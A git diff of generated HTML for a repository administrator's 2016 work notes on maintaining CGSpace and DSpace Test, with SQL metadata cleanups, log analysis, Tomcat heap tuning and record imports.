# /opt/letsencrypt/letsencrypt-auto renew --standalone --pre-hook "/usr/bin/service nginx stop" --post-hook "/usr/bin/service nginx start"
+# /opt/letsencrypt/letsencrypt-auto renew --standalone --pre-hook "/usr/bin/service nginx stop" --post-hook "/usr/bin/service nginx start"
- I really need to fix that cron job…
@@ -328,8 +328,8 @@ UPDATE 960
- Run the replacements/deletes for
dc.description.sponsorship
(investors) on CGSpace:
-$ ./fix-metadata-values.py -i investors-not-blank-not-delete-85.csv -f dc.description.sponsorship -t 'correct investor' -m 29 -d cgspace -p 'fuuu' -u cgspace
-$ ./delete-metadata-values.py -i investors-delete-82.csv -f dc.description.sponsorship -m 29 -d cgspace -p 'fuuu' -u cgspace
+$ ./fix-metadata-values.py -i investors-not-blank-not-delete-85.csv -f dc.description.sponsorship -t 'correct investor' -m 29 -d cgspace -p 'fuuu' -u cgspace
+$ ./delete-metadata-values.py -i investors-delete-82.csv -f dc.description.sponsorship -m 29 -d cgspace -p 'fuuu' -u cgspace
- The scripts for this are here:
@@ -367,9 +367,9 @@ $ ./delete-metadata-values.py -i investors-delete-82.csv -f dc.description.spons
- Run all cleanups and deletions of
dc.contributor.corporate
on CGSpace:
-$ ./fix-metadata-values.py -i Corporate-Authors-Fix-121.csv -f dc.contributor.corporate -t 'Correct style' -m 126 -d cgspace -u cgspace -p 'fuuu'
-$ ./fix-metadata-values.py -i Corporate-Authors-Fix-PB.csv -f dc.contributor.corporate -t 'should be' -m 126 -d cgspace -u cgspace -p 'fuuu'
-$ ./delete-metadata-values.py -f dc.contributor.corporate -i Corporate-Authors-Delete-13.csv -m 126 -u cgspace -d cgspace -p 'fuuu'
+$ ./fix-metadata-values.py -i Corporate-Authors-Fix-121.csv -f dc.contributor.corporate -t 'Correct style' -m 126 -d cgspace -u cgspace -p 'fuuu'
+$ ./fix-metadata-values.py -i Corporate-Authors-Fix-PB.csv -f dc.contributor.corporate -t 'should be' -m 126 -d cgspace -u cgspace -p 'fuuu'
+$ ./delete-metadata-values.py -f dc.contributor.corporate -i Corporate-Authors-Delete-13.csv -m 126 -u cgspace -d cgspace -p 'fuuu'
- Re-deploy CGSpace and DSpace Test with latest June changes
- Now the sharing and Altmetric bits are more prominent:
@@ -383,11 +383,11 @@ $ ./delete-metadata-values.py -f dc.contributor.corporate -i Corporate-Authors-D
- Wow, there are 95 authors in the database who have ‘,’ at the end of their name:
-
# select text_value from metadatavalue where metadata_field_id=3 and text_value like '%,';
+# select text_value from metadatavalue where metadata_field_id=3 and text_value like '%,';
- We need to use something like this to fix them, need to write a proper regex later:
-# update metadatavalue set text_value = regexp_replace(text_value, '(Poole, J),', '\1') where metadata_field_id=3 and text_value = 'Poole, J,';
+# update metadatavalue set text_value = regexp_replace(text_value, '(Poole, J),', '\1') where metadata_field_id=3 and text_value = 'Poole, J,';
diff --git a/docs/2016-07/index.html b/docs/2016-07/index.html
index 041966912..5577bcce7 100644
--- a/docs/2016-07/index.html
+++ b/docs/2016-07/index.html
@@ -44,7 +44,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
In this case the select query was showing 95 results before the update
"/>
-
+
@@ -135,9 +135,9 @@ In this case the select query was showing 95 results before the update
Add dc.description.sponsorship
to Discovery sidebar facets and make investors clickable in item view (#232)
I think this query should find and replace all authors that have “,” at the end of their names:
-dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, '(^.+?),$', '\1') where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
+dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, '(^.+?),$', '\1') where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
UPDATE 95
-dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
+dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
text_value
------------
(0 rows)
@@ -158,7 +158,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
We really only need statistics
and authority
but meh
Fix metadata for species on DSpace Test:
-$ ./fix-metadata-values.py -i /tmp/Species-Peter-Fix.csv -f dc.Species -t CORRECT -m 94 -d dspacetest -u dspacetest -p 'fuuu'
+$ ./fix-metadata-values.py -i /tmp/Species-Peter-Fix.csv -f dc.Species -t CORRECT -m 94 -d dspacetest -u dspacetest -p 'fuuu'
- Will run later on CGSpace
- A user is still having problems with Sherpa/Romeo causing crashes during the submission process when the journal is “ungraded”
@@ -169,7 +169,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
- Delete 23 blank metadata values from CGSpace:
-
cgspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
+cgspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
DELETE 23
- Complete phase three of metadata migration, for the following fields:
@@ -188,9 +188,9 @@ DELETE 23
- Also, run fixes and deletes for species and author affiliations (over 1000 corrections!)
-$ ./fix-metadata-values.py -i Species-Peter-Fix.csv -f dc.Species -t CORRECT -m 212 -d dspace -u dspace -p 'fuuu'
-$ ./fix-metadata-values.py -i Affiliations-Fix-1045-Peter-Abenet.csv -f dc.contributor.affiliation -t Correct -m 211 -d dspace -u dspace -p 'fuuu'
-$ ./delete-metadata-values.py -f dc.contributor.affiliation -i Affiliations-Delete-Peter-Abenet.csv -m 211 -u dspace -d dspace -p 'fuuu'
+$ ./fix-metadata-values.py -i Species-Peter-Fix.csv -f dc.Species -t CORRECT -m 212 -d dspace -u dspace -p 'fuuu'
+$ ./fix-metadata-values.py -i Affiliations-Fix-1045-Peter-Abenet.csv -f dc.contributor.affiliation -t Correct -m 211 -d dspace -u dspace -p 'fuuu'
+$ ./delete-metadata-values.py -f dc.contributor.affiliation -i Affiliations-Delete-Peter-Abenet.csv -m 211 -u dspace -d dspace -p 'fuuu'
- I then ran all server updates and rebooted the server
@@ -221,7 +221,7 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
- I suspect it’s someone hitting REST too much:
-# awk '{print $1}' /var/log/nginx/rest.log | sort -n | uniq -c | sort -h | tail -n 3
+# awk '{print $1}' /var/log/nginx/rest.log | sort -n | uniq -c | sort -h | tail -n 3
710 66.249.78.38
1781 181.118.144.29
24904 70.32.99.142
diff --git a/docs/2016-08/index.html b/docs/2016-08/index.html
index d2b0f5be6..8ee34ba3e 100644
--- a/docs/2016-08/index.html
+++ b/docs/2016-08/index.html
@@ -42,7 +42,7 @@ $ git checkout -b 55new 5_x-prod
$ git reset --hard ilri/5_x-prod
$ git rebase -i dspace-5.5
"/>
-
+
@@ -166,7 +166,7 @@ $ git rebase -i dspace-5.5
Fix item display incorrectly displaying Species when Breeds were present (#260)
Experiment with fixing more authors, like Delia Grace:
-dspacetest=# update metadatavalue set authority='0b4fcbc1-d930-4319-9b4d-ea1553cca70b', confidence=600 where metadata_field_id=3 and text_value='Grace, D.';
+dspacetest=# update metadatavalue set authority='0b4fcbc1-d930-4319-9b4d-ea1553cca70b', confidence=600 where metadata_field_id=3 and text_value='Grace, D.';
2016-08-06
- Finally figured out how to remove “View/Open” and “Bitstreams” from the item view
@@ -184,8 +184,8 @@ $ git rebase -i dspace-5.5
- Install latest Oracle Java 8 JDK
- Create
setenv.sh
in Tomcat 8 libexec/bin
directory:
-CATALINA_OPTS="-Djava.awt.headless=true -Xms3072m -Xmx3072m -XX:+UseConcMarkSweepGC -XX:+CMSIncrementalMode -Dfile.encoding=UTF-8"
-CATALINA_OPTS="$CATALINA_OPTS -Djava.library.path=/opt/brew/Cellar/tomcat-native/1.2.8/lib"
+CATALINA_OPTS="-Djava.awt.headless=true -Xms3072m -Xmx3072m -XX:+UseConcMarkSweepGC -XX:+CMSIncrementalMode -Dfile.encoding=UTF-8"
+CATALINA_OPTS="$CATALINA_OPTS -Djava.library.path=/opt/brew/Cellar/tomcat-native/1.2.8/lib"
JRE_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_102.jdk/Contents/Home
@@ -246,7 +246,7 @@ $ ln -sv ~/dspace/webapps/solr /opt/brew/Cellar/tomcat/8.5.4/libexec/webapps/sol
- Fix “CONGO,DR” country name in
input-forms.xml
(#264)
- Also need to fix existing records using the incorrect form in the database:
-dspace=# update metadatavalue set text_value='CONGO, DR' where resource_type_id=2 and metadata_field_id=228 and text_value='CONGO,DR';
+dspace=# update metadatavalue set text_value='CONGO, DR' where resource_type_id=2 and metadata_field_id=228 and text_value='CONGO,DR';
- I asked a question on the DSpace mailing list about updating “preferred” forms of author names from ORCID
@@ -300,12 +300,12 @@ Database Driver: PostgreSQL Native Driver version PostgreSQL 9.1 JDBC4 (build 90
Talk to Atmire about the DSpace 5.5 issue, and it seems to be caused by a bug in FlywayDB
They said I should delete the Atmire migrations
-dspacetest=# delete from schema_version where description = 'Atmire CUA 4 migration' and version='5.1.2015.12.03.2';
-dspacetest=# delete from schema_version where description = 'Atmire MQM migration' and version='5.1.2015.12.03.3';
+dspacetest=# delete from schema_version where description = 'Atmire CUA 4 migration' and version='5.1.2015.12.03.2';
+dspacetest=# delete from schema_version where description = 'Atmire MQM migration' and version='5.1.2015.12.03.3';
- After that DSpace starts up by XMLUI now has unrelated issues that I need to solve!
-org.apache.avalon.framework.configuration.ConfigurationException: Type 'ThemeResourceReader' does not exist for 'map:read' at jndi:/localhost/themes/0_CGIAR/sitemap.xmap:136:77
+org.apache.avalon.framework.configuration.ConfigurationException: Type 'ThemeResourceReader' does not exist for 'map:read' at jndi:/localhost/themes/0_CGIAR/sitemap.xmap:136:77
context:/jndi:/localhost/themes/0_CGIAR/sitemap.xmap - 136:77
- Looks like we’re missing some stuff in the XMLUI module’s
sitemap.xmap
, as well as in each of our XMLUI themes
@@ -324,13 +324,13 @@ context:/jndi:/localhost/themes/0_CGIAR/sitemap.xmap - 136:77
- Clean up and import 48 CCAFS records into DSpace Test
- SQL to get all journal titles from dc.source (55), since it’s apparently used for internal DSpace filename shit, but we moved all our journal titles there a few months ago:
-dspacetest=# select distinct text_value from metadatavalue where metadata_field_id=55 and text_value !~ '.*(\.pdf|\.png|\.PDF|\.Pdf|\.JPEG|\.jpg|\.JPG|\.jpeg|\.xls|\.rtf|\.docx?|\.potx|\.dotx|\.eqa|\.tiff|\.mp4|\.mp3|\.gif|\.zip|\.txt|\.pptx|\.indd|\.PNG|\.bmp|\.exe|org\.dspace\.app\.mediafilter).*';
+dspacetest=# select distinct text_value from metadatavalue where metadata_field_id=55 and text_value !~ '.*(\.pdf|\.png|\.PDF|\.Pdf|\.JPEG|\.jpg|\.JPG|\.jpeg|\.xls|\.rtf|\.docx?|\.potx|\.dotx|\.eqa|\.tiff|\.mp4|\.mp3|\.gif|\.zip|\.txt|\.pptx|\.indd|\.PNG|\.bmp|\.exe|org\.dspace\.app\.mediafilter).*';
2016-08-25
- Atmire suggested adding a missing bean to
dspace/config/spring/api/atmire-cua.xml
but it doesn’t help:
...
-Error creating bean with name 'MetadataStorageInfoService'
+Error creating bean with name 'MetadataStorageInfoService'
...
- Atmire sent an updated version of
dspace/config/spring/api/atmire-cua.xml
and now XMLUI starts but gives a null pointer exception:
@@ -351,7 +351,7 @@ Error creating bean with name 'MetadataStorageInfoService'
- Import the 47 CCAFS records to CGSpace, creating the SimpleArchiveFormat bundles and importing like:
$ ./safbuilder.sh -c /tmp/Thumbnails\ to\ Upload\ to\ CGSpace/3546.csv
-$ JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m" /home/cgspace.cgiar.org/bin/dspace import -a -e aorth@mjanja.ch -c 10568/3546 -s /tmp/Thumbnails\ to\ Upload\ to\ CGSpace/SimpleArchiveFormat -m 3546.map
+$ JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m" /home/cgspace.cgiar.org/bin/dspace import -a -e aorth@mjanja.ch -c 10568/3546 -s /tmp/Thumbnails\ to\ Upload\ to\ CGSpace/SimpleArchiveFormat -m 3546.map
- Finally got DSpace 5.5 working with the Atmire modules after a few rounds of back and forth with Atmire devs
diff --git a/docs/2016-09/index.html b/docs/2016-09/index.html
index 1cc0df08e..1caf406c8 100644
--- a/docs/2016-09/index.html
+++ b/docs/2016-09/index.html
@@ -14,7 +14,7 @@ Discuss how the migration of CGIAR’s Active Directory to a flat structure
We had been using DC=ILRI to determine whether a user was ILRI or not
It looks like we might be able to use OUs now, instead of DCs:
-$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)"
+$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)"
" />
@@ -32,9 +32,9 @@ Discuss how the migration of CGIAR’s Active Directory to a flat structure
We had been using DC=ILRI to determine whether a user was ILRI or not
It looks like we might be able to use OUs now, instead of DCs:
-$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)"
+$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)"
"/>
-
+
@@ -127,7 +127,7 @@ $ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=or
We had been using DC=ILRI
to determine whether a user was ILRI or not
It looks like we might be able to use OUs now, instead of DCs:
-$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)"
+$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)"
- User who has been migrated to the root vs user still in the hierarchical structure:
@@ -142,15 +142,15 @@ distinguishedName: CN=Last\, First (ILRI),OU=ILRI Ethiopia Employees,OU=ILRI Eth
$ dropdb dspacetest
$ createdb -O dspacetest --encoding=UNICODE dspacetest
-$ psql dspacetest -c 'alter user dspacetest createuser;'
+$ psql dspacetest -c 'alter user dspacetest createuser;'
$ pg_restore -O -U dspacetest -d dspacetest ~/Downloads/cgspace_2016-09-01.backup
-$ psql dspacetest -c 'alter user dspacetest nocreateuser;'
+$ psql dspacetest -c 'alter user dspacetest nocreateuser;'
$ psql -U dspacetest -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest -h localhost
$ vacuumdb dspacetest
- Some names that I thought I fixed in July seem not to be:
-dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Poole, %';
+dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Poole, %';
text_value | authority | confidence
-----------------------+--------------------------------------+------------
Poole, Elizabeth Jane | b6efa27f-8829-4b92-80fe-bc63e03e3ccb | 600
@@ -163,12 +163,12 @@ $ vacuumdb dspacetest
- At least a few of these actually have the correct ORCID, but I will unify the authority to be c3a22456-8d6a-41f9-bba0-de51ef564d45
-dspacetest=# update metadatavalue set authority='c3a22456-8d6a-41f9-bba0-de51ef564d45', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Poole, %';
+dspacetest=# update metadatavalue set authority='c3a22456-8d6a-41f9-bba0-de51ef564d45', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Poole, %';
UPDATE 69
- And for Peter Ballantyne:
-dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Ballantyne, %';
+dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Ballantyne, %';
text_value | authority | confidence
-------------------+--------------------------------------+------------
Ballantyne, Peter | 2dcbcc7b-47b0-4fd7-bef9-39d554494081 | 600
@@ -180,26 +180,26 @@ UPDATE 69
- Again, a few have the correct ORCID, but there should only be one authority…
-dspacetest=# update metadatavalue set authority='4f04ca06-9a76-4206-bd9c-917ca75d278e', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Ballantyne, %';
+dspacetest=# update metadatavalue set authority='4f04ca06-9a76-4206-bd9c-917ca75d278e', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Ballantyne, %';
UPDATE 58
- And for me:
-dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Orth, A%';
+dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Orth, A%';
text_value | authority | confidence
------------+--------------------------------------+------------
Orth, Alan | 4884def0-4d7e-4256-9dd4-018cd60a5871 | 600
Orth, A. | 4884def0-4d7e-4256-9dd4-018cd60a5871 | 600
Orth, A. | 1a1943a0-3f87-402f-9afe-e52fb46a513e | 600
(3 rows)
-dspacetest=# update metadatavalue set authority='1a1943a0-3f87-402f-9afe-e52fb46a513e', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Orth, %';
+dspacetest=# update metadatavalue set authority='1a1943a0-3f87-402f-9afe-e52fb46a513e', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Orth, %';
UPDATE 11
- And for CCAFS author Bruce Campbell that I had discussed with CCAFS earlier this week:
-dspacetest=# update metadatavalue set authority='0e414b4c-4671-4a23-b570-6077aca647d8', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Campbell, B%';
+dspacetest=# update metadatavalue set authority='0e414b4c-4671-4a23-b570-6077aca647d8', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Campbell, B%';
UPDATE 166
-dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Campbell, B%';
+dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Campbell, B%';
text_value | authority | confidence
------------------------+--------------------------------------+------------
Campbell, Bruce | 0e414b4c-4671-4a23-b570-6077aca647d8 | 600
@@ -215,18 +215,18 @@ dspacetest=# select distinct text_value, authority, confidence from metadatavalu
- After one week of logging TLS connections on CGSpace:
-# zgrep "DES-CBC3" /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | wc -l
+# zgrep "DES-CBC3" /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | wc -l
217
# zcat -f -- /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | wc -l
1164376
-# zgrep "DES-CBC3" /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | awk '{print $6}' | sort | uniq
+# zgrep "DES-CBC3" /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | awk '{print $6}' | sort | uniq
TLSv1/DES-CBC3-SHA
TLSv1/EDH-RSA-DES-CBC3-SHA
- So this represents
0.02%
of 1.16M connections over a one-week period
- Transforming some filenames in OpenRefine so they can have a useful description for SAFBuilder:
-value + "__description:" + cells["dc.type"].value
+value + "__description:" + cells["dc.type"].value
- This gives you, for example:
Mainstreaming gender in agricultural R&D.pdf__description:Brief
@@ -251,7 +251,7 @@ TLSv1/EDH-RSA-DES-CBC3-SHA
If I unzip the original zip from CIAT on Windows, re-zip it with 7zip on Windows, and then unzip it on Linux directly, the file names seem to be proper UTF-8
We should definitely clean filenames so they don’t use characters that are tricky to process in CSV and shell scripts, like: ,
, '
, and "
-value.replace("'","").replace(",","").replace('"','')
+value.replace("'","").replace(",","").replace('"','')
- I need to write a Python script to match that for renaming files in the file system
- When importing SAF bundles it seems you can specify the target collection on the command line using
-c 10568/4003
or in the collections
file inside each item in the bundle
@@ -264,7 +264,7 @@ TLSv1/EDH-RSA-DES-CBC3-SHA
- Import CIAT Gender Network records to CGSpace, first creating the SAF bundles as my user, then importing as the
tomcat7
user, and deleting the bundle, for each collection’s items:
$ ./safbuilder.sh -c /home/aorth/ciat-gender-2016-09-06/66601.csv
-$ JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m" /home/cgspace.cgiar.org/bin/dspace import -a -e aorth@mjanja.ch -c 10568/66601 -s /home/aorth/ciat-gender-2016-09-06/SimpleArchiveFormat -m 66601.map
+$ JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m" /home/cgspace.cgiar.org/bin/dspace import -a -e aorth@mjanja.ch -c 10568/66601 -s /home/aorth/ciat-gender-2016-09-06/SimpleArchiveFormat -m 66601.map
$ rm -rf ~/ciat-gender-2016-09-06/SimpleArchiveFormat/
2016-09-07
@@ -299,13 +299,13 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
- I restarted Tomcat and it was ok again
- CGSpace crashed a few hours later, errors from
catalina.out
:
-Exception in thread "http-bio-127.0.0.1-8081-exec-25" java.lang.OutOfMemoryError: Java heap space
+Exception in thread "http-bio-127.0.0.1-8081-exec-25" java.lang.OutOfMemoryError: Java heap space
at java.lang.StringCoding.decode(StringCoding.java:215)
- We haven’t seen that in quite a while…
- Indeed, in a month of logs it only occurs 15 times:
-# grep -rsI "OutOfMemoryError" /var/log/tomcat7/catalina.* | wc -l
+# grep -rsI "OutOfMemoryError" /var/log/tomcat7/catalina.* | wc -l
15
- I also see a bunch of errors from dspace.log:
@@ -315,11 +315,11 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
- Looking at REST requests, it seems there is one IP hitting us nonstop:
-# awk '{print $1}' /var/log/nginx/rest.log | sort -n | uniq -c | sort -h | tail -n 3
+# awk '{print $1}' /var/log/nginx/rest.log | sort -n | uniq -c | sort -h | tail -n 3
820 50.87.54.15
12872 70.32.99.142
25744 70.32.83.92
-# awk '{print $1}' /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 3
+# awk '{print $1}' /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 3
7966 181.118.144.29
54706 70.32.99.142
109412 70.32.83.92
@@ -333,7 +333,7 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
- And more heap space errors:
-# grep -rsI "OutOfMemoryError" /var/log/tomcat7/catalina.* | wc -l
+# grep -rsI "OutOfMemoryError" /var/log/tomcat7/catalina.* | wc -l
19
- There are no more rest requests since the last crash, so maybe there are other things causing this.
@@ -349,7 +349,7 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
- From the activity control panel I can see 58 unique IPs hitting the site concurrently, which has GOT to hurt our stability
- A list of all 2000 unique IPs from CGSpace logs today:
-# grep ip_addr= /home/cgspace.cgiar.org/log/dspace.log.2016-09-11 | awk -F: '{print $5}' | sort -n | uniq -c | sort -h | tail -n 100
+# grep ip_addr= /home/cgspace.cgiar.org/log/dspace.log.2016-09-11 | awk -F: '{print $5}' | sort -n | uniq -c | sort -h | tail -n 100
- Looking at the top 20 IPs or so, most are Yahoo, MSN, Google, Baidu, TurnitIn (iParadigm), etc… do we have any real users?
- Generate a list of all author affiliations for Peter Ballantyne to go through, make corrections, and create a lookup list from:
@@ -363,7 +363,7 @@ Wed Sep 14 09:47:28 UTC 2016 | Updating : 6/6 docs.
Commit
Commit done
dn:CN=Haman\, Magdalena (CIAT-CCAFS),OU=Standard,OU=Users,OU=HQ,OU=CIATHUB,dc=cgiarad,dc=org
-Exception in thread "http-bio-127.0.0.1-8081-exec-193" java.lang.OutOfMemoryError: Java heap space
+Exception in thread "http-bio-127.0.0.1-8081-exec-193" java.lang.OutOfMemoryError: Java heap space
- And after that I see a bunch of “pool error Timeout waiting for idle object”
- Later, near the time of the next crash I see:
@@ -376,7 +376,7 @@ Commit done
Sep 14, 2016 11:32:22 AM com.sun.jersey.server.wadl.generators.WadlGeneratorJAXBGrammarGenerator buildModelAndSchemas
SEVERE: Failed to generate the schema for the JAX-B elements
com.sun.xml.bind.v2.runtime.IllegalAnnotationsException: 2 counts of IllegalAnnotationExceptions
-java.util.Map is an interface, and JAXB can't handle interfaces.
+java.util.Map is an interface, and JAXB can't handle interfaces.
this problem is related to the following location:
at java.util.Map
at public java.util.Map com.atmire.dspace.rest.common.Statlet.getRender()
@@ -389,7 +389,7 @@ java.util.Map does not have a no-arg default constructor.
- Then 20 minutes later another outOfMemoryError:
-Exception in thread "http-bio-127.0.0.1-8081-exec-25" java.lang.OutOfMemoryError: Java heap space
+Exception in thread "http-bio-127.0.0.1-8081-exec-25" java.lang.OutOfMemoryError: Java heap space
at java.lang.StringCoding.decode(StringCoding.java:215)
- Perhaps these particular issues are memory issues, the munin graphs definitely show some weird purging/allocating behavior starting this week
@@ -402,7 +402,7 @@ java.util.Map does not have a no-arg default constructor.
- Oh great, the configuration on the actual server is different than in configuration management!
- Seems we added a bunch of settings to the
/etc/default/tomcat7
in December, 2015 and never updated our ansible repository:
-JAVA_OPTS="-Djava.awt.headless=true -Xms3584m -Xmx3584m -XX:MaxPermSize=256m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8 -XX:-UseGCOverheadLimit -XX:MaxGCPauseMillis=250 -XX:GCTimeRatio=9 -XX:+PerfDisableSharedMem -XX:+ParallelRefProcEnabled -XX:G1HeapRegionSize=8m -XX:InitiatingHeapOccupancyPercent=75 -XX:+UseLargePages -XX:+AggressiveOpts"
+JAVA_OPTS="-Djava.awt.headless=true -Xms3584m -Xmx3584m -XX:MaxPermSize=256m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8 -XX:-UseGCOverheadLimit -XX:MaxGCPauseMillis=250 -XX:GCTimeRatio=9 -XX:+PerfDisableSharedMem -XX:+ParallelRefProcEnabled -XX:G1HeapRegionSize=8m -XX:InitiatingHeapOccupancyPercent=75 -XX:+UseLargePages -XX:+AggressiveOpts"
- So I’m going to bump the heap +512m and remove all the other experimental shit (and update ansible!)
- Increased JVM heap to 4096m on CGSpace (linode01)
@@ -423,14 +423,14 @@ Thu Sep 15 18:45:26 UTC 2016 | Updating : 200/218 docs.
Thu Sep 15 18:45:27 UTC 2016 | Updating : 218/218 docs.
Commit
Commit done
-Exception in thread "http-bio-127.0.0.1-8081-exec-247" java.lang.OutOfMemoryError: Java heap space
-Exception in thread "http-bio-127.0.0.1-8081-exec-241" java.lang.OutOfMemoryError: Java heap space
-Exception in thread "http-bio-127.0.0.1-8081-exec-243" java.lang.OutOfMemoryError: Java heap space
-Exception in thread "http-bio-127.0.0.1-8081-exec-258" java.lang.OutOfMemoryError: Java heap space
-Exception in thread "http-bio-127.0.0.1-8081-exec-268" java.lang.OutOfMemoryError: Java heap space
-Exception in thread "http-bio-127.0.0.1-8081-exec-263" java.lang.OutOfMemoryError: Java heap space
-Exception in thread "http-bio-127.0.0.1-8081-exec-280" java.lang.OutOfMemoryError: Java heap space
-Exception in thread "Thread-54216" org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Exception writing document id 7feaa95d-8e1f-4f45-80bb
+Exception in thread "http-bio-127.0.0.1-8081-exec-247" java.lang.OutOfMemoryError: Java heap space
+Exception in thread "http-bio-127.0.0.1-8081-exec-241" java.lang.OutOfMemoryError: Java heap space
+Exception in thread "http-bio-127.0.0.1-8081-exec-243" java.lang.OutOfMemoryError: Java heap space
+Exception in thread "http-bio-127.0.0.1-8081-exec-258" java.lang.OutOfMemoryError: Java heap space
+Exception in thread "http-bio-127.0.0.1-8081-exec-268" java.lang.OutOfMemoryError: Java heap space
+Exception in thread "http-bio-127.0.0.1-8081-exec-263" java.lang.OutOfMemoryError: Java heap space
+Exception in thread "http-bio-127.0.0.1-8081-exec-280" java.lang.OutOfMemoryError: Java heap space
+Exception in thread "Thread-54216" org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Exception writing document id 7feaa95d-8e1f-4f45-80bb
-e14ef82ee224 to the index; possible analysis error.
at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
@@ -443,7 +443,7 @@ Exception in thread "Thread-54216" org.apache.solr.client.solrj.impl.H
- I bumped the heap space from 4096m to 5120m to see if this is really about heap speace or not.
- Looking into some of these errors that I’ve seen this week but haven’t noticed before:
-# zcat -f -- /var/log/tomcat7/catalina.* | grep -c 'Failed to generate the schema for the JAX-B elements'
+# zcat -f -- /var/log/tomcat7/catalina.* | grep -c 'Failed to generate the schema for the JAX-B elements'
113
- I’ve sent a message to Atmire about the Solr error to see if it’s related to their batch update module
@@ -474,7 +474,7 @@ $ ./delete-metadata-values.py -f cg.contributor.affiliation -i affiliations_pb-2
- Turns out the Solr search logic switched from OR to AND in DSpace 6.0 and the change is easy to backport: https://jira.duraspace.org/browse/DS-2809
- We just need to set this in
dspace/solr/search/conf/schema.xml
:
-<solrQueryParser defaultOperator="AND"/>
+<solrQueryParser defaultOperator="AND"/>
- It actually works really well, and search results return much less hits now (before, after):
@@ -533,12 +533,12 @@ OCSP Response Data:
Discuss fixing some ORCIDs for CCAFS author Sonja Vermeulen with Magdalena Haman
This author has a few variations:
-dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeu
-len, S%';
+dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeu
+len, S%';
- And it looks like
fe4b719f-6cc4-4d65-8504-7a83130b9f83
is the authority with the correct ORCID linked
-dspacetest=# update metadatavalue set authority='fe4b719f-6cc4-4d65-8504-7a83130b9f83w', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen, S%';
